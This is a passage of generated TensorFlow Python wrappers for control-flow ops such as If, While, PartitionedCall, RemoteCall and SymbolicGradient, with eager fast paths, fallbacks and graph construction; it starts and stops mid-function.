  limit = _ops.convert_to_tensor(limit, _dtypes.int32)
  delta = _ops.convert_to_tensor(delta, _dtypes.int32)
  _inputs_flat = [start, limit, delta] + list(input)
  _attrs = ("T", _attr_T, "body", body)
  _outputs = _execute.execute(b"For", len(input), inputs=_inputs_flat,
                              attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "For", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def _if(cond, input, Tout, then_branch, else_branch, output_shapes=[], name=None):
  r"""output = cond ? then_branch(input) : else_branch(input)

  Args:
    cond: A `Tensor`.
      A Tensor. If the tensor is a scalar of non-boolean type, the
      scalar is converted to a boolean according to the
      following rule: if the scalar is a numerical value, non-zero means
      `True` and zero means False; if the scalar is a string, non-empty
      means `True` and empty means `False`. If the tensor is not a scalar,
      being empty means False and being non-empty means True.
    input: A list of `Tensor` objects. A list of input tensors.
    Tout: A list of `tf.DTypes`. A list of output types.
    then_branch: A function decorated with @Defun.
      A function that takes 'inputs' and returns a list of tensors, whose
      types are the same as what else_branch returns.
    else_branch: A function decorated with @Defun.
      A function that takes 'inputs' and returns a list of tensors, whose
      types are the same as what then_branch returns.
    output_shapes: An optional list of shapes (each a `tf.TensorShape` or list of `ints`). Defaults to `[]`.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `Tout`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name, "If", name,
        _ctx._post_execution_callbacks, cond, input, "Tout", Tout,
        "then_branch", then_branch, "else_branch", else_branch,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return _if_eager_fallback(
            cond, input, Tout=Tout, then_branch=then_branch,
            else_branch=else_branch, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'if' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  if output_shapes is None:
    output_shapes = []
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'if' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "If", cond=cond, input=input, Tout=Tout, then_branch=then_branch,
        else_branch=else_branch, output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  # When Tout is empty the op has no output tensors; return the Operation.
  if not _result:
    return _op
  _inputs_flat = _op.inputs
  _attrs = ("Tcond", _op.get_attr("Tcond"), "Tin", _op.get_attr("Tin"),
            "Tout", _op.get_attr("Tout"), "then_branch",
            _op.get_attr("then_branch"), "else_branch",
            _op.get_attr("else_branch"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "If", _inputs_flat, _attrs, _result, name)
  return _result
def If(cond, input, Tout, then_branch, else_branch, output_shapes=[], name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return _if(cond, input, Tout, then_branch, else_branch,
             output_shapes=output_shapes, name=name)
If.__doc__ = _if.__doc__
If = _doc_controls.do_not_generate_docs(_kwarg_only(If))
tf_export("raw_ops.If")(If)
def _if_eager_fallback(cond, input, Tout, then_branch, else_branch, output_shapes=[], name=None, ctx=None):
  r"""Eager-mode slow path for `_if`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to 'if' Op, not %r." % Tout)
  Tout = [_execute.make_type(_dt, "Tout") for _dt in Tout]
  if output_shapes is None:
    output_shapes = []
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to 'if' Op, not %r."
        % output_shapes)
  output_shapes = [_execute.make_shape(_ts, "output_shapes")
                   for _ts in output_shapes]
  _attr_Tcond, (cond,) = _execute.args_to_matching_eager([cond], _ctx)
  _attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
  _inputs_flat = [cond] + list(input)
  _attrs = ("Tcond", _attr_Tcond, "Tin", _attr_Tin, "Tout", Tout,
            "then_branch", then_branch, "else_branch", else_branch,
            "output_shapes", output_shapes)
  _outputs = _execute.execute(b"If", len(Tout), inputs=_inputs_flat,
                              attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "If", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def partitioned_call(args, Tout, f, config="", config_proto="", executor_type="", name=None):
  r"""returns `f(inputs)`, where `f`'s body is placed and partitioned.

  Args:
    args: A list of `Tensor` objects. A list of input tensors.
    Tout: A list of `tf.DTypes`. A list of output types.
    f: A function decorated with @Defun.
      A function that takes 'args', a list of tensors, and returns 'output',
      another list of tensors. Input and output types are specified by 'Tin'
      and 'Tout'. The function body of f will be placed and partitioned across
      devices, setting this op apart from the regular Call op.
    config: An optional `string`. Defaults to `""`.
    config_proto: An optional `string`. Defaults to `""`.
    executor_type: An optional `string`. Defaults to `""`.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `Tout`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "PartitionedCall", name, _ctx._post_execution_callbacks, args, "Tout",
        Tout, "f", f, "config", config, "config_proto", config_proto,
        "executor_type", executor_type)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return partitioned_call_eager_fallback(
            args, Tout=Tout, f=f, config=config, config_proto=config_proto,
            executor_type=executor_type, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'partitioned_call' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  # Normalize the optional string attrs to their "" defaults.
  if config is None:
    config = ""
  config = _execute.make_str(config, "config")
  if config_proto is None:
    config_proto = ""
  config_proto = _execute.make_str(config_proto, "config_proto")
  if executor_type is None:
    executor_type = ""
  executor_type = _execute.make_str(executor_type, "executor_type")
  _, _, _op = _op_def_lib._apply_op_helper(
        "PartitionedCall", args=args, Tout=Tout, f=f, config=config,
        config_proto=config_proto,
        executor_type=executor_type, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
            _op.get_attr("f"), "config", _op.get_attr("config"),
            "config_proto", _op.get_attr("config_proto"), "executor_type",
            _op.get_attr("executor_type"))
  _execute.record_gradient(
      "PartitionedCall", _inputs_flat, _attrs, _result, name)
  return _result
def PartitionedCall(args, Tout, f, config="", config_proto="", executor_type="", name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return partitioned_call(args, Tout, f, config=config,
                          config_proto=config_proto,
                          executor_type=executor_type, name=name)
PartitionedCall.__doc__ = partitioned_call.__doc__
PartitionedCall = _doc_controls.do_not_generate_docs(_kwarg_only(PartitionedCall))
tf_export("raw_ops.PartitionedCall")(PartitionedCall)
def partitioned_call_eager_fallback(args, Tout, f, config="", config_proto="", executor_type="", name=None, ctx=None):
  r"""Eager-mode slow path for `partitioned_call`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to 'partitioned_call' Op, not %r."
        % Tout)
  Tout = [_execute.make_type(_dt, "Tout") for _dt in Tout]
  # Normalize the optional string attrs to their "" defaults.
  if config is None: config = ""
  config = _execute.make_str(config, "config")
  if config_proto is None: config_proto = ""
  config_proto = _execute.make_str(config_proto, "config_proto")
  if executor_type is None: executor_type = ""
  executor_type = _execute.make_str(executor_type, "executor_type")
  _attr_Tin, args = _execute.convert_to_mixed_eager_tensors(args, _ctx)
  _inputs_flat = list(args)
  _attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f, "config", config,
            "config_proto", config_proto, "executor_type", executor_type)
  _outputs = _execute.execute(b"PartitionedCall", len(Tout),
                              inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                              name=name)
  _execute.record_gradient(
      "PartitionedCall", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def remote_call(target, args, Tout, f, name=None):
  r"""Runs function `f` on a remote device indicated by `target`.

  Args:
    target: A `Tensor` of type `string`.
      A fully specified device name where we want to run the function.
    args: A list of `Tensor` objects. A list of arguments for the function.
    Tout: A list of `tf.DTypes` that has length `>= 1`.
      The type list for the return values.
    f: A function decorated with @Defun. The function to run remotely.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `Tout`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "RemoteCall", name, _ctx._post_execution_callbacks, target, args,
        "Tout", Tout, "f", f)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return remote_call_eager_fallback(
            target, args, Tout=Tout, f=f, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'remote_call' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  _, _, _op = _op_def_lib._apply_op_helper(
        "RemoteCall", target=target, args=args, Tout=Tout, f=f, name=name)
  _result = _op.outputs[:]
  # When Tout is empty the op has no output tensors; return the Operation.
  if not _result:
    return _op
  _inputs_flat = _op.inputs
  _attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
            _op.get_attr("f"))
  _execute.record_gradient(
      "RemoteCall", _inputs_flat, _attrs, _result, name)
  return _result
def RemoteCall(target, args, Tout, f, name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return remote_call(target, args, Tout, f, name=name)
RemoteCall.__doc__ = remote_call.__doc__
RemoteCall = _doc_controls.do_not_generate_docs(_kwarg_only(RemoteCall))
tf_export("raw_ops.RemoteCall")(RemoteCall)
def remote_call_eager_fallback(target, args, Tout, f, name=None, ctx=None):
  r"""Eager-mode slow path for `remote_call`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to 'remote_call' Op, not %r."
        % Tout)
  Tout = [_execute.make_type(_dt, "Tout") for _dt in Tout]
  _attr_Tin, args = _execute.convert_to_mixed_eager_tensors(args, _ctx)
  # The target device name is always a string tensor.
  target = _ops.convert_to_tensor(target, _dtypes.string)
  _inputs_flat = [target] + list(args)
  _attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f)
  _outputs = _execute.execute(b"RemoteCall", len(Tout), inputs=_inputs_flat,
                              attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "RemoteCall", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def stateful_partitioned_call(args, Tout, f, config="", config_proto="", executor_type="", name=None):
  r"""returns `f(inputs)`, where `f`'s body is placed and partitioned.

  Args:
    args: A list of `Tensor` objects. A list of input tensors.
    Tout: A list of `tf.DTypes`. A list of output types.
    f: A function decorated with @Defun.
      A function that takes 'args', a list of tensors, and returns 'output',
      another list of tensors. Input and output types are specified by 'Tin'
      and 'Tout'. The function body of f will be placed and partitioned across
      devices, setting this op apart from the regular Call op. This op is
      stateful.
    config: An optional `string`. Defaults to `""`.
    config_proto: An optional `string`. Defaults to `""`.
    executor_type: An optional `string`. Defaults to `""`.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `Tout`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "StatefulPartitionedCall", name, _ctx._post_execution_callbacks, args,
        "Tout", Tout, "f", f, "config", config, "config_proto", config_proto,
        "executor_type", executor_type)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return stateful_partitioned_call_eager_fallback(
            args, Tout=Tout, f=f, config=config, config_proto=config_proto,
            executor_type=executor_type, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'stateful_partitioned_call' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  # Normalize the optional string attrs to their "" defaults.
  if config is None:
    config = ""
  config = _execute.make_str(config, "config")
  if config_proto is None:
    config_proto = ""
  config_proto = _execute.make_str(config_proto, "config_proto")
  if executor_type is None:
    executor_type = ""
  executor_type = _execute.make_str(executor_type, "executor_type")
  _, _, _op = _op_def_lib._apply_op_helper(
        "StatefulPartitionedCall", args=args, Tout=Tout, f=f, config=config,
        config_proto=config_proto,
        executor_type=executor_type, name=name)
  _result = _op.outputs[:]
  # When Tout is empty the op has no output tensors; return the Operation.
  if not _result:
    return _op
  _inputs_flat = _op.inputs
  _attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
            _op.get_attr("f"), "config", _op.get_attr("config"),
            "config_proto", _op.get_attr("config_proto"), "executor_type",
            _op.get_attr("executor_type"))
  _execute.record_gradient(
      "StatefulPartitionedCall", _inputs_flat, _attrs, _result, name)
  return _result
def StatefulPartitionedCall(args, Tout, f, config="", config_proto="", executor_type="", name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return stateful_partitioned_call(args, Tout, f, config=config,
                                   config_proto=config_proto,
                                   executor_type=executor_type, name=name)
StatefulPartitionedCall.__doc__ = stateful_partitioned_call.__doc__
StatefulPartitionedCall = _doc_controls.do_not_generate_docs(_kwarg_only(StatefulPartitionedCall))
tf_export("raw_ops.StatefulPartitionedCall")(StatefulPartitionedCall)
def stateful_partitioned_call_eager_fallback(args, Tout, f, config="", config_proto="", executor_type="", name=None, ctx=None):
  r"""Eager-mode slow path for `stateful_partitioned_call`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'stateful_partitioned_call' Op, not %r." % Tout)
  Tout = [_execute.make_type(_dt, "Tout") for _dt in Tout]
  # Normalize the optional string attrs to their "" defaults.
  if config is None: config = ""
  config = _execute.make_str(config, "config")
  if config_proto is None: config_proto = ""
  config_proto = _execute.make_str(config_proto, "config_proto")
  if executor_type is None: executor_type = ""
  executor_type = _execute.make_str(executor_type, "executor_type")
  _attr_Tin, args = _execute.convert_to_mixed_eager_tensors(args, _ctx)
  _inputs_flat = list(args)
  _attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f, "config", config,
            "config_proto", config_proto, "executor_type", executor_type)
  _outputs = _execute.execute(b"StatefulPartitionedCall", len(Tout),
                              inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                              name=name)
  _execute.record_gradient(
      "StatefulPartitionedCall", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def stateless_if(cond, input, Tout, then_branch, else_branch, name=None):
  r"""output = cond ? then_branch(input) : else_branch(input)

  Args:
    cond: A `Tensor`.
      A Tensor. If the tensor is a scalar of non-boolean type, the
      scalar is converted to a boolean according to the
      following rule: if the scalar is a numerical value, non-zero means
      `True` and zero means False; if the scalar is a string, non-empty
      means `True` and empty means `False`. If the tensor is not a scalar,
      being empty means False and being non-empty means True.

      This should only be used when the if then/else body functions do not
      have stateful ops.
    input: A list of `Tensor` objects. A list of input tensors.
    Tout: A list of `tf.DTypes`. A list of output types.
    then_branch: A function decorated with @Defun.
      A function that takes 'inputs' and returns a list of tensors, whose
      types are the same as what else_branch returns.
    else_branch: A function decorated with @Defun.
      A function that takes 'inputs' and returns a list of tensors, whose
      types are the same as what then_branch returns.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `Tout`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "StatelessIf", name, _ctx._post_execution_callbacks, cond, input,
        "Tout", Tout, "then_branch", then_branch, "else_branch", else_branch)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return stateless_if_eager_fallback(
            cond, input, Tout=Tout, then_branch=then_branch,
            else_branch=else_branch, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'stateless_if' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  _, _, _op = _op_def_lib._apply_op_helper(
        "StatelessIf", cond=cond, input=input, Tout=Tout,
        then_branch=then_branch, else_branch=else_branch,
        name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("Tcond", _op.get_attr("Tcond"), "Tin", _op.get_attr("Tin"),
            "Tout", _op.get_attr("Tout"), "then_branch",
            _op.get_attr("then_branch"), "else_branch",
            _op.get_attr("else_branch"))
  _execute.record_gradient(
      "StatelessIf", _inputs_flat, _attrs, _result, name)
  return _result
def StatelessIf(cond, input, Tout, then_branch, else_branch, name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return stateless_if(cond, input, Tout, then_branch, else_branch, name=name)
StatelessIf.__doc__ = stateless_if.__doc__
StatelessIf = _doc_controls.do_not_generate_docs(_kwarg_only(StatelessIf))
tf_export("raw_ops.StatelessIf")(StatelessIf)
def stateless_if_eager_fallback(cond, input, Tout, then_branch, else_branch, name=None, ctx=None):
  r"""Eager-mode slow path for `stateless_if`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to 'stateless_if' Op, not %r."
        % Tout)
  Tout = [_execute.make_type(_dt, "Tout") for _dt in Tout]
  _attr_Tcond, (cond,) = _execute.args_to_matching_eager([cond], _ctx)
  _attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
  _inputs_flat = [cond] + list(input)
  _attrs = ("Tcond", _attr_Tcond, "Tin", _attr_Tin, "Tout", Tout,
            "then_branch", then_branch, "else_branch", else_branch)
  _outputs = _execute.execute(b"StatelessIf", len(Tout), inputs=_inputs_flat,
                              attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "StatelessIf", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def stateless_while(input, cond, body, name=None):
  r"""output = input; While (Cond(output)) { output = Body(output) }

  Args:
    input: A list of `Tensor` objects.
      A list of input tensors whose types are T.
    cond: A function decorated with @Defun.
      A function takes 'input' and returns a tensor. If the tensor is
      a scalar of non-boolean, the scalar is converted to a boolean
      according to the following rule: if the scalar is a numerical
      value, non-zero means True and zero means False; if the scalar is
      a string, non-empty means True and empty means False. If the
      tensor is not a scalar, non-emptiness means True and False
      otherwise.

      This should only be used when the while condition and body functions
      do not have stateful ops.
    body: A function decorated with @Defun.
      A function that takes a list of tensors and returns another
      list of tensors. Both lists have the same types as specified
      by T.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects. Has the same type as `input`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "StatelessWhile", name, _ctx._post_execution_callbacks, input, "cond",
        cond, "body", body)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return stateless_while_eager_fallback(
            input, cond=cond, body=body, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
        "StatelessWhile", input=input, cond=cond, body=body, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("T", _op.get_attr("T"), "cond", _op.get_attr("cond"), "body",
            _op.get_attr("body"))
  _execute.record_gradient(
      "StatelessWhile", _inputs_flat, _attrs, _result, name)
  return _result
def StatelessWhile(input, cond, body, name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return stateless_while(input, cond, body, name=name)
StatelessWhile.__doc__ = stateless_while.__doc__
StatelessWhile = _doc_controls.do_not_generate_docs(_kwarg_only(StatelessWhile))
tf_export("raw_ops.StatelessWhile")(StatelessWhile)
def stateless_while_eager_fallback(input, cond, body, name=None, ctx=None):
  r"""Eager-mode slow path for `stateless_while`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  _attr_T, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
  _inputs_flat = list(input)
  _attrs = ("T", _attr_T, "cond", cond, "body", body)
  # The While op produces one output per loop variable.
  _outputs = _execute.execute(b"StatelessWhile", len(input),
                              inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                              name=name)
  _execute.record_gradient(
      "StatelessWhile", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def symbolic_gradient(input, Tout, f, name=None):
  r"""Computes the gradient function for function f via backpropagation.

  Args:
    input: A list of `Tensor` objects. a list of input tensors of size N + M;
    Tout: A list of `tf.DTypes` that has length `>= 1`.
      the type list for the input list.
    f: A function decorated with @Defun.
      The function we want to compute the gradient for.

      The function 'f' must be a numerical function which takes N inputs and
      produces M outputs. Its gradient function 'g', which is computed by
      this SymbolicGradient op is a function taking N + M inputs and
      produces N outputs.

      I.e. if we have
         (y1, y2, ..., y_M) = f(x1, x2, ..., x_N),
      then, g is
         (dL/dx1, dL/dx2, ..., dL/dx_N) = g(x1, x2, ..., x_N,
                                            dL/dy1, dL/dy2, ..., dL/dy_M),
      where L is a scalar-value function of (x1, x2, ..., xN) (e.g., the
      loss function). dL/dx_i is the partial derivative of L with respect
      to x_i.

      (Needs some math expert to say the comment above better.)
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `Tout`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "SymbolicGradient", name, _ctx._post_execution_callbacks, input,
        "Tout", Tout, "f", f)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return symbolic_gradient_eager_fallback(
            input, Tout=Tout, f=f, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'symbolic_gradient' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  _, _, _op = _op_def_lib._apply_op_helper(
        "SymbolicGradient", input=input, Tout=Tout, f=f, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"), "f",
            _op.get_attr("f"))
  _execute.record_gradient(
      "SymbolicGradient", _inputs_flat, _attrs, _result, name)
  return _result
def SymbolicGradient(input, Tout, f, name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return symbolic_gradient(input, Tout, f, name=name)
SymbolicGradient.__doc__ = symbolic_gradient.__doc__
SymbolicGradient = _doc_controls.do_not_generate_docs(_kwarg_only(SymbolicGradient))
tf_export("raw_ops.SymbolicGradient")(SymbolicGradient)
def symbolic_gradient_eager_fallback(input, Tout, f, name=None, ctx=None):
  r"""Eager-mode slow path for `symbolic_gradient`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to 'symbolic_gradient' Op, not %r."
        % Tout)
  Tout = [_execute.make_type(_dt, "Tout") for _dt in Tout]
  _attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
  _inputs_flat = list(input)
  _attrs = ("Tin", _attr_Tin, "Tout", Tout, "f", f)
  _outputs = _execute.execute(b"SymbolicGradient", len(Tout),
                              inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                              name=name)
  _execute.record_gradient(
      "SymbolicGradient", _inputs_flat, _attrs, _outputs, name)
  return _outputs
def _while(input, cond, body, output_shapes=None, parallel_iterations=10, name=None):
  r"""output = input; While (Cond(output)) { output = Body(output) }

  Args:
    input: A list of `Tensor` objects.
      A list of input tensors whose types are T.
    cond: A function decorated with @Defun.
      A function takes 'input' and returns a tensor. If the tensor is
      a scalar of non-boolean, the scalar is converted to a boolean
      according to the following rule: if the scalar is a numerical
      value, non-zero means True and zero means False; if the scalar is
      a string, non-empty means True and empty means False. If the
      tensor is not a scalar, non-emptiness means True and False
      otherwise.
    body: A function decorated with @Defun.
      A function that takes a list of tensors and returns another
      list of tensors. Both lists have the same types as specified
      by T.
    output_shapes: An optional list of shapes (each a `tf.TensorShape` or list of `ints`). Defaults to `[]`.
    parallel_iterations: An optional `int`. Defaults to `10`.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects. Has the same type as `input`.
  """
  # FIX: the signature default used to be the mutable literal `[]` (a shared
  # object across all calls). Use `None` as sentinel and normalize up front so
  # the eager fast path still receives `[]` exactly as before.
  if output_shapes is None:
    output_shapes = []
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager fast path: dispatch straight through the C extension.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name, "While",
        name, _ctx._post_execution_callbacks, input, "cond", cond, "body",
        body, "output_shapes", output_shapes, "parallel_iterations",
        parallel_iterations)
      return _result
    except _core._FallbackException:
      try:
        # Slow eager path when the fast path cannot handle the inputs.
        return _while_eager_fallback(
            input, cond=cond, body=body, output_shapes=output_shapes,
            parallel_iterations=parallel_iterations, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'while' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  if parallel_iterations is None:
    parallel_iterations = 10
  parallel_iterations = _execute.make_int(parallel_iterations, "parallel_iterations")
  _, _, _op = _op_def_lib._apply_op_helper(
        "While", input=input, cond=cond, body=body,
                 output_shapes=output_shapes,
                 parallel_iterations=parallel_iterations, name=name)
  _result = _op.outputs[:]
  if not _result:
    # Stateful op with no outputs: return the Operation itself.
